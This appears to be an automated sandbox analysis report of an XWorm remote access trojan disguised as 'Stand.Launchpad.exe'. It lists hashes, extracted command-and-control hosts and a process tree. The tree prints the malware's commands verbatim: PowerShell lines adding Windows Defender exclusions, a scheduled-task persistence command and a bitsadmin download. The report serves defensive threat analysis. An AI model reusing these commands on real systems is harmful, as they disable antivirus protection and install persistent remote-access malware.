Analysis

  • max time kernel
    145s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 04:12

General

  • Target

    Stand.Launchpad.exe

  • Size

    140KB

  • MD5

    bec01d16b6f3c443eb3912042c1fc7f9

  • SHA1

    436c7fabff54997f2e550754edea0ae791080c9b

  • SHA256

    2aa6b748a1ee67ba3f68a53228bbc14ed8ce1285e1dde54d310e2ca8797eb779

  • SHA512

    4101f563c479a22883a024cbd9ba9d5a46234a237471b14853a82263e96f0ac74eb101dd77a71aab98101c8cb1c9c15ed987a45b3540d300c6bb740b707b27e1

  • SSDEEP

    3072:J5XMHZjqrraIh3GGKt6cGuPN1OHXFhTVR7NetgV:H85jqrWIhGlN1sVhTwtg

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:40971

us3.localto.net:40971

Name1442-40971.portmap.host:40971

Attributes
  • Install_directory

    %Temp%

  • install_file

    Stand.exe

Signatures

  • Detect Xworm Payload 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe
    "C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.exe
        3⤵
        • Download via BitsAdmin
        PID:2584
    • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
      "C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1656
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1640
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {84D18E47-A245-4D5E-BC4A-3643A59487EE} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1876
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1164
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2968

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Downloader.hta

    Filesize

    893B

    MD5

    b0a6d4e05dc2225dd03902a3061a4041

    SHA1

    39c500eefbf78d7d51768edb6983c361213cb7b8

    SHA256

    05e5c927c6366bebab2fb341d233887f503fb692d8f6880f7d1327b64705c1ee

    SHA512

    96fb1e3046a0daddd6a17a38fcfa8ad6e00f8c4950cc7e46c8a79b24817b2f271229d15facaa510105d3c95234a9f095fdf8ff8bbb8099c47565bd955c316918

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    08bada4f319ea4dfca2b071b5af72c20

    SHA1

    bb53e82ef774ba900fc4ae9322cee816f27e4d4e

    SHA256

    12f78f810ba3d809182f9e0142ccb0b5c25b8e3eed0c68f73db7aa6edec097f7

    SHA512

    0600b85196e1f3e3f2da20f765a3e1489fd8244646c56d2be9c3736d54c87d20c7c69fab3f7239cd0ea7443a94cd545ff25e80a41f4081175b6a418a1e0c9677

  • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

    Filesize

    108KB

    MD5

    d51da3fa31165f2536dddad44974af34

    SHA1

    703a62d92fbfe23611297715ca50bb82b4ff55a1

    SHA256

    9cc68d4ab822bd8e5fd66f40b2c99bce04805505e593027aca67256ab63c6210

    SHA512

    3adfaf5e251d974a9d576c71e51e3b1c59ddee2feecf281801166cf9448a3e51e6066737c06bee20089721630f4016f16ae7297061112cb23f2fe786386e4197

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • memory/1164-60-0x0000000000C90000-0x0000000000CB0000-memory.dmp

    Filesize

    128KB

  • memory/1664-35-0x000000001B5A0000-0x000000001B882000-memory.dmp

    Filesize

    2.9MB

  • memory/1664-36-0x0000000001F70000-0x0000000001F78000-memory.dmp

    Filesize

    32KB

  • memory/1876-56-0x00000000000D0000-0x00000000000F0000-memory.dmp

    Filesize

    128KB

  • memory/1920-1-0x0000000000A70000-0x0000000000A98000-memory.dmp

    Filesize

    160KB

  • memory/1920-0-0x000007FEF5043000-0x000007FEF5044000-memory.dmp

    Filesize

    4KB

  • memory/2960-29-0x0000000001F70000-0x0000000001F78000-memory.dmp

    Filesize

    32KB

  • memory/2960-28-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

    Filesize

    2.9MB

  • memory/2968-62-0x0000000000E50000-0x0000000000E70000-memory.dmp

    Filesize

    128KB

  • memory/3008-57-0x0000000000CD0000-0x0000000000CDC000-memory.dmp

    Filesize

    48KB

  • memory/3008-9-0x0000000000F80000-0x0000000000FA0000-memory.dmp

    Filesize

    128KB